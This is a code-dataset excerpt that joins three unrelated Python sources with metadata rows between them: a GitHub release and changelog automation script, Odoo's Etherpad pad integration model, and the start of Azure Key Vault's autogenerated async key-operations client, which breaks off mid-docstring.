'{{#pullrequests}}\n' \
'\n' \
' - {{title}} [\#{{number}}]({{pull_request.html_url}})\n' \
'{{/pullrequests}}\n' \
'{{^pullrequests}}\n' \
'\n' \
'_None_\n' \
'{{/pullrequests}}\n'
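# changelog_template is a mustache template; create_changelog() below renders it with pystache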
def get_closed_issues(repo,
token=os.environ.get('GITHUB_TOKEN', None),
since=None,
logger=EmptyLogger()):
logger.debug('Getting issues for %s' % (repo))
if not token:
raise ReleaseError('Must provide a valid GitHub API token')
issues = []
params = {'state': 'closed', 'sort': 'asc', 'access_token': token, }
if since:
since = since.astimezone(timezone.utc)
params['since'] = since.isoformat()[:19] + 'Z'
r = requests.get('https://api.github.com/repos/%s/issues' % repo,
params=params)
if r.status_code != 200:
raise ReleaseError('Failed to retrieve github issues from %s: %s' %
(repo, r.json()['message']))
issues = r.json()
logger.debug('Retrieved %i closed issues for %s' % (len(issues), repo))
return issues
def create_changelog(current_version,
previous_version,
repo,
milestone=None,
token=os.environ.get('GITHUB_TOKEN', None),
description=None,
since=None,
date=datetime.utcnow(),
template=changelog_template,
logger=EmptyLogger()):
logger.debug('Creating changelog for %s from %s' % (current_version, repo))
description = description or 'The v%s release of %s' % (current_version,
repo.split('/')[1])
issues = get_closed_issues(repo=repo,
token=token,
since=since,
logger=logger)
if milestone:
milestone[
'html_url'] = 'https://github.com/%s/issues?q=milestone%%3Av%s+is%%3Aall' % (
repo, current_version)
data = {
'version': {
'from': str(previous_version)
if previous_version > (0, 0, 0) else None,
'to': str(current_version),
},
'milestone': milestone,
'date': date.isoformat()[:10],
'repo': repo,
'description': description,
'issues': [i for i in issues if not i.get('pull_request', None)],
'pullrequests': [i for i in issues if i.get('pull_request', None)],
}
renderer = pystache.Renderer()
parsed = pystache.parse(template)
changelog = renderer.render(parsed, data)
logger.info('Rendered changelog')
return changelog
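# Illustrative call (assumes a valid GitHub API token): create_changelog(Version(1, 2, 0), Version(1, 1, 0), 'owner/repo', token=token)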
def write_version(path, version, logger=EmptyLogger()):
if not isinstance(version, Version):
raise ValueError('must provide a version class')
version = Version(version)
with open(path, 'w') as f:
f.write('%s' % version)
logger.info('Wrote %s' % os.path.basename(path))
def write_changelog(path, changelog, logger=EmptyLogger()):
try:
for line in fileinput.input(path, inplace=True):
sys.stdout.write(line)
if line.startswith('# Changelog'):
print()
sys.stdout.write(changelog)
logger.info('Updated %s' % os.path.basename(path))
except EnvironmentError as e:
if e.errno == errno.ENOENT:
with open(path, 'w') as f:
f.write('# Changelog\n\n')
f.write(changelog)
logger.info('Created %s' % os.path.basename(path))
else:
raise
def get_git_root(path, git_executable=find_exe_in_path('git')):
abspath = os.path.abspath(path)
if os.path.isfile(abspath):
abspath = os.path.dirname(abspath)
cmd = [git_executable, 'rev-parse', '--show-toplevel']
_, out, _ = execute_command(cmd,
'Failed to find root of repository',
cwd=abspath)
return out.strip()
def commit_file(path,
message,
git_executable=find_exe_in_path('git'),
logger=EmptyLogger()):
if isinstance(git_executable, list):
git_executable = git_executable[0]
logger.debug('Commiting %s' % path)
cwd = get_git_root(path, git_executable=git_executable)
path = os.path.relpath(path, cwd)
cmd = [git_executable, 'add', path]
execute_command(cmd, 'Failed to add file %s' % path, cwd=cwd)
cmd = [git_executable, 'commit', '-m', message]
execute_command(cmd, 'Failed to commit file %s' % path, cwd=cwd)
logger.info('Committed %s' % path)
def get_tag_date(tag,
path=os.getcwd(),
git_executable=find_exe_in_path('git')):
if isinstance(git_executable, list):
git_executable = git_executable[0]
cwd = get_git_root(path, git_executable=git_executable)
cmd = [git_executable, 'log', '-1', '--format=%ai', tag]
_, out, _ = execute_command(cmd,
'Failed to get tag date: %s' % tag,
cwd=cwd)
out = out.strip()
return datetime.strptime(out, '%Y-%m-%d %H:%M:%S %z')
def create_git_version_tag(version,
message=None,
path=os.getcwd(),
git_executable=find_exe_in_path('git'),
logger=EmptyLogger()):
if isinstance(git_executable, list):
git_executable = git_executable[0]
if not isinstance(version, Version):
raise ValueError('must provide a version class')
version = Version(version)
logger.debug('Tagging %s' % version)
message = message or 'The v%s release of the project' % version
cwd = get_git_root(path, git_executable=git_executable)
cmd = [git_executable, 'tag', '-a', 'v%s' % version, '-m', message]
execute_command(cmd, 'Failed to create version tag %s' % version, cwd=cwd)
logger.info('Tagged %s' % version)
def create_release(repo,
version,
description,
token=os.environ.get('GITHUB_TOKEN', None),
files=[],
path=os.getcwd(),
git_executable=find_exe_in_path('git'),
logger=EmptyLogger()):
if isinstance(git_executable, list):
git_executable = git_executable[0]
if not isinstance(version, Version):
raise ValueError('must provide a version class')
logger.debug('Creating github release %s' % version)
r = requests.post('https://api.github.com/repos/%s/releases' % repo,
params={
'access_token': token,
},
json={
'tag_name': 'v%s' % version,
'name': str(version),
'body': description,
})
if r.status_code != 201:
json = r.json()
message = json['message']
errors = json.get('errors', [])
for e in errors:
message += '\n - %s: %s: %s' % (e.get('resource', 'unknown'),
e.get('field', 'unknown'),
e.get('code', 'unknown'))
raise ReleaseError('Failed to create github release %s: %s' %
(repo, message))
logger.info('Created GitHub release')
def release(category='patch',
path=os.getcwd(),
git_executable=find_exe_in_path('git'),
token=os.environ.get('GITHUB_TOKEN', None),
repo=None,
date=datetime.utcnow(),
description=None,
changelog='CHANGELOG.md',
version='VERSION',
template=changelog_template,
logger=EmptyLogger(),
hooks={}):
'''
Performs the release of a repository on GitHub.
'''
if isinstance(git_executable, list):
git_executable = git_executable[0]
logger.debug('Starting %r release' % category)
git_version = get_git_version(git_executable=git_executable, logger=logger)
if git_version < (1, 0, 0):
raise ReleaseError('The version of git is too old %s' % git_version)
previous_version = get_git_tag_version(path=path,
git_executable=git_executable,
logger=logger)
if previous_version.dirty:
raise ReleaseError(
'Cannot release a dirty repository. Make sure all files are committed')
current_version = Version(previous_version)
previous_version = Version(current_version)
current_version.bump(category)
logger.debug('Previous version %r' % previous_version)
logger.debug('Bumped version %r' % current_version)
repo = repo or get_repo(path=path, git_executable=git_executable)
description = description or 'The v%s release of %s' % (current_version,
repo.split('/')[1])
milestones = get_milestones(repo=repo, token=token, logger=logger)
try:
milestone = [
m
for m in milestones
if m['title'] == ('v%s' % current_version) and m['state'] == 'open'
][0]
open_issues = milestone['open_issues']
if open_issues:
raise ReleaseError('The v%s milestone has %d open issues' %
(current_version, open_issues))
except IndexError:
milestone = None
try:
previous_date = get_tag_date('v%s' % previous_version,
path=path,
git_executable=git_executable)
except ExecuteCommandError:
previous_date = None
changelog_data = create_changelog(description=description,
repo=repo,
date=date,
token=token,
current_version=current_version,
previous_version=previous_version,
template=template,
since=previous_date,
logger=logger,
milestone=milestone)
changelog_data = hooks.get('changelog', lambda d: d)(changelog_data)
write_changelog(path=os.path.join(path, changelog),
changelog=changelog_data,
logger=logger)
commit_file(changelog,
'Updated changelog for v%s' % current_version,
git_executable=git_executable,
logger=logger)
write_version(path=os.path.join(path, version),
version=current_version,
logger=logger)
commit_file(version,
'Updated version to v%s' % current_version,
git_executable=git_executable,
logger=logger)
create_git_version_tag(current_version,
message=description,
path=path,
git_executable=git_executable,
logger=logger)
logger.debug('Pushing branch to remote')
cwd = get_git_root(path, git_executable=git_executable)
cmd = [git_executable, 'push']
execute_command(cmd, 'Failed to push to remote', cwd=cwd)
logger.info('Pushed branch to remote')
logger.debug('Pushing tags to remote')
cwd = get_git_root(path, git_executable=git_executable)
cmd = [git_executable, 'push', '--tags']
execute_command(cmd, 'Failed to push tags to remote', cwd=cwd)
logger.info('Pushed tags to remote')
files = []
create_release(path=path,
version=current_version,
description=changelog_data,
git_executable=git_executable,
repo=repo,
logger=logger,
files=files,
token=token)
if milestone:
close_milestone(number=milestone['number'],
repo=repo,
token=token,
logger=logger)
logger.info('Released %s' % current_version)
|
bsd-3-clause
| -6,535,361,961,749,887,000
| 34.026499
| 114
| 0.510472
| false
| 4.129913
| false
| false
| false
|
rven/odoo
|
addons/pad/models/pad.py
|
1
|
5592
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import logging
import random
import re
import string
import requests
from odoo import api, models, _
from odoo.exceptions import UserError
from ..py_etherpad import EtherpadLiteClient
_logger = logging.getLogger(__name__)
class PadCommon(models.AbstractModel):
_name = 'pad.common'
_description = 'Pad Common'
def _valid_field_parameter(self, field, name):
return name == 'pad_content_field' or super()._valid_field_parameter(field, name)
@api.model
def pad_is_configured(self):
return bool(self.env.company.pad_server)
@api.model
def pad_generate_url(self):
company = self.env.company.sudo()
pad = {
"server": company.pad_server,
"key": company.pad_key,
}
        # make sure the pad server URL is in the form http://hostname
if not pad["server"]:
return pad
if not pad["server"].startswith('http'):
pad["server"] = 'http://' + pad["server"]
pad["server"] = pad["server"].rstrip('/')
# generate a salt
s = string.ascii_uppercase + string.digits
salt = ''.join([s[random.SystemRandom().randint(0, len(s) - 1)] for i in range(10)])
# path
# etherpad hardcodes pad id length limit to 50
path = '-%s-%s' % (self._name, salt)
path = '%s%s' % (self.env.cr.dbname.replace('_', '-')[0:50 - len(path)], path)
        # construct the url
url = '%s/p/%s' % (pad["server"], path)
# if create with content
if self.env.context.get('field_name') and self.env.context.get('model'):
myPad = EtherpadLiteClient(pad["key"], pad["server"] + '/api')
try:
myPad.createPad(path)
except IOError:
raise UserError(_("Pad creation failed, either there is a problem with your pad server URL or with your connection."))
# get attr on the field model
model = self.env[self.env.context["model"]]
field = model._fields[self.env.context['field_name']]
real_field = field.pad_content_field
res_id = self.env.context.get("object_id")
record = model.browse(res_id)
# get content of the real field
real_field_value = record[real_field] or self.env.context.get('record', {}).get(real_field, '')
if real_field_value:
myPad.setHtmlFallbackText(path, real_field_value)
return {
"server": pad["server"],
"path": path,
"url": url,
}
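    # pad_get_content fetches the pad as HTML via the Etherpad API and falls back to the public /export/html endpoint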
@api.model
def pad_get_content(self, url):
company = self.env.company.sudo()
myPad = EtherpadLiteClient(company.pad_key, (company.pad_server or '') + '/api')
content = ''
if url:
split_url = url.split('/p/')
path = len(split_url) == 2 and split_url[1]
try:
content = myPad.getHtml(path).get('html', '')
except IOError:
_logger.warning('Http Error: the credentials might be absent for url: "%s". Falling back.' % url)
try:
r = requests.get('%s/export/html' % url)
r.raise_for_status()
except Exception:
_logger.warning("No pad found with url '%s'.", url)
else:
mo = re.search('<body>(.*)</body>', r.content.decode(), re.DOTALL)
if mo:
content = mo.group(1)
return content
# TODO
# reverse engineer protocol to be setHtml without using the api key
def write(self, vals):
self._set_field_to_pad(vals)
self._set_pad_to_field(vals)
return super(PadCommon, self).write(vals)
@api.model
def create(self, vals):
# Case of a regular creation: we receive the pad url, so we need to update the
# corresponding field
self._set_pad_to_field(vals)
pad = super(PadCommon, self).create(vals)
        # Case of a programmatic creation (e.g. copy): we receive the field content, so we need
# to create the corresponding pad
if self.env.context.get('pad_no_create', False):
return pad
for k, field in self._fields.items():
if hasattr(field, 'pad_content_field') and k not in vals:
ctx = {
'model': self._name,
'field_name': k,
'object_id': pad.id,
}
pad_info = self.with_context(**ctx).pad_generate_url()
pad[k] = pad_info.get('url')
return pad
def _set_field_to_pad(self, vals):
# Update the pad if the `pad_content_field` is modified
for k, field in self._fields.items():
if hasattr(field, 'pad_content_field') and vals.get(field.pad_content_field) and self[k]:
company = self.env.user.sudo().company_id
myPad = EtherpadLiteClient(company.pad_key, (company.pad_server or '') + '/api')
path = self[k].split('/p/')[1]
myPad.setHtmlFallbackText(path, vals[field.pad_content_field])
def _set_pad_to_field(self, vals):
# Update the `pad_content_field` if the pad is modified
for k, v in list(vals.items()):
field = self._fields.get(k)
if hasattr(field, 'pad_content_field'):
vals[field.pad_content_field] = self.pad_get_content(v)
|
agpl-3.0
| -3,819,001,917,685,144,000
| 36.530201
| 134
| 0.552933
| false
| 3.86722
| false
| false
| false
|
Azure/azure-sdk-for-python
|
sdk/keyvault/azure-keyvault-keys/azure/keyvault/keys/_generated/v2016_10_01/aio/operations/_key_vault_client_operations.py
|
1
|
230715
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class KeyVaultClientOperationsMixin:
async def create_key(
self,
vault_base_url: str,
key_name: str,
parameters: "_models.KeyCreateParameters",
**kwargs: Any
) -> "_models.KeyBundle":
"""Creates a new key, stores it, then returns key parameters and attributes to the client.
The create key operation can be used to create any key type in Azure Key Vault. If the named
key already exists, Azure Key Vault creates a new version of the key. It requires the
keys/create permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name for the new key. The system will generate the version name for the
new key.
:type key_name: str
:param parameters: The parameters to create a key.
:type parameters: ~azure.keyvault.v2016_10_01.models.KeyCreateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.KeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str', pattern=r'^[0-9a-zA-Z-]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'KeyCreateParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_key.metadata = {'url': '/keys/{key-name}/create'} # type: ignore
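    # Illustrative usage (names assumed, requires an authenticated generated client):
    #   bundle = await client.create_key("https://myvault.vault.azure.net", "my-key",
    #                                    _models.KeyCreateParameters(kty="RSA"))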
async def import_key(
self,
vault_base_url: str,
key_name: str,
parameters: "_models.KeyImportParameters",
**kwargs: Any
) -> "_models.KeyBundle":
"""Imports an externally created key, stores it, and returns key parameters and attributes to the client.
The import key operation may be used to import any key type into an Azure Key Vault. If the
named key already exists, Azure Key Vault creates a new version of the key. This operation
requires the keys/import permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: Name for the imported key.
:type key_name: str
:param parameters: The parameters to import a key.
:type parameters: ~azure.keyvault.v2016_10_01.models.KeyImportParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.KeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.import_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str', pattern=r'^[0-9a-zA-Z-]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'KeyImportParameters')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
import_key.metadata = {'url': '/keys/{key-name}'} # type: ignore
async def delete_key(
self,
vault_base_url: str,
key_name: str,
**kwargs: Any
) -> "_models.DeletedKeyBundle":
"""Deletes a key of any type from storage in Azure Key Vault.
The delete key operation cannot be used to remove individual versions of a key. This operation
removes the cryptographic material associated with the key, which means the key is not usable
for Sign/Verify, Wrap/Unwrap or Encrypt/Decrypt operations. This operation requires the
keys/delete permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key to delete.
:type key_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DeletedKeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.DeletedKeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DeletedKeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.delete_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('DeletedKeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_key.metadata = {'url': '/keys/{key-name}'} # type: ignore
async def update_key(
self,
vault_base_url: str,
key_name: str,
key_version: str,
parameters: "_models.KeyUpdateParameters",
**kwargs: Any
) -> "_models.KeyBundle":
"""The update key operation changes specified attributes of a stored key and can be applied to any key type and key version stored in Azure Key Vault.
In order to perform this operation, the key must already exist in the Key Vault. Note: The
cryptographic material of a key itself cannot be changed. This operation requires the
keys/update permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of key to update.
:type key_name: str
:param key_version: The version of the key to update.
:type key_version: str
:param parameters: The parameters of the key to update.
:type parameters: ~azure.keyvault.v2016_10_01.models.KeyUpdateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.KeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
'key-version': self._serialize.url("key_version", key_version, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'KeyUpdateParameters')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_key.metadata = {'url': '/keys/{key-name}/{key-version}'} # type: ignore
async def get_key(
self,
vault_base_url: str,
key_name: str,
key_version: str,
**kwargs: Any
) -> "_models.KeyBundle":
"""Gets the public part of a stored key.
The get key operation is applicable to all key types. If the requested key is symmetric, then
no key material is released in the response. This operation requires the keys/get permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key to get.
:type key_name: str
:param key_version: Adding the version parameter retrieves a specific version of a key.
:type key_version: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.KeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.get_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
'key-version': self._serialize.url("key_version", key_version, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_key.metadata = {'url': '/keys/{key-name}/{key-version}'} # type: ignore
def get_key_versions(
self,
vault_base_url: str,
key_name: str,
maxresults: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.KeyListResult"]:
"""Retrieves a list of individual key versions with the same key name.
The full key identifier, attributes, and tags are provided in the response. This operation
requires the keys/list permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param maxresults: Maximum number of results to return in a page. If not specified the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either KeyListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.keyvault.v2016_10_01.models.KeyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_key_versions.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('KeyListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_key_versions.metadata = {'url': '/keys/{key-name}/versions'} # type: ignore
def get_keys(
self,
vault_base_url: str,
maxresults: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.KeyListResult"]:
"""List keys in the specified vault.
Retrieves a list of the keys in the Key Vault as JSON Web Key structures that contain the
public part of a stored key. The LIST operation is applicable to all key types, however only
the base key identifier, attributes, and tags are provided in the response. Individual versions
of a key are not listed in the response. This operation requires the keys/list permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param maxresults: Maximum number of results to return in a page. If not specified the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either KeyListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.keyvault.v2016_10_01.models.KeyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_keys.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('KeyListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_keys.metadata = {'url': '/keys'} # type: ignore
async def backup_key(
self,
vault_base_url: str,
key_name: str,
**kwargs: Any
) -> "_models.BackupKeyResult":
"""Requests that a backup of the specified key be downloaded to the client.
The Key Backup operation exports a key from Azure Key Vault in a protected form. Note that this
operation does NOT return key material in a form that can be used outside the Azure Key Vault
        system, the returned key material is either protected to an Azure Key Vault HSM or to Azure Key
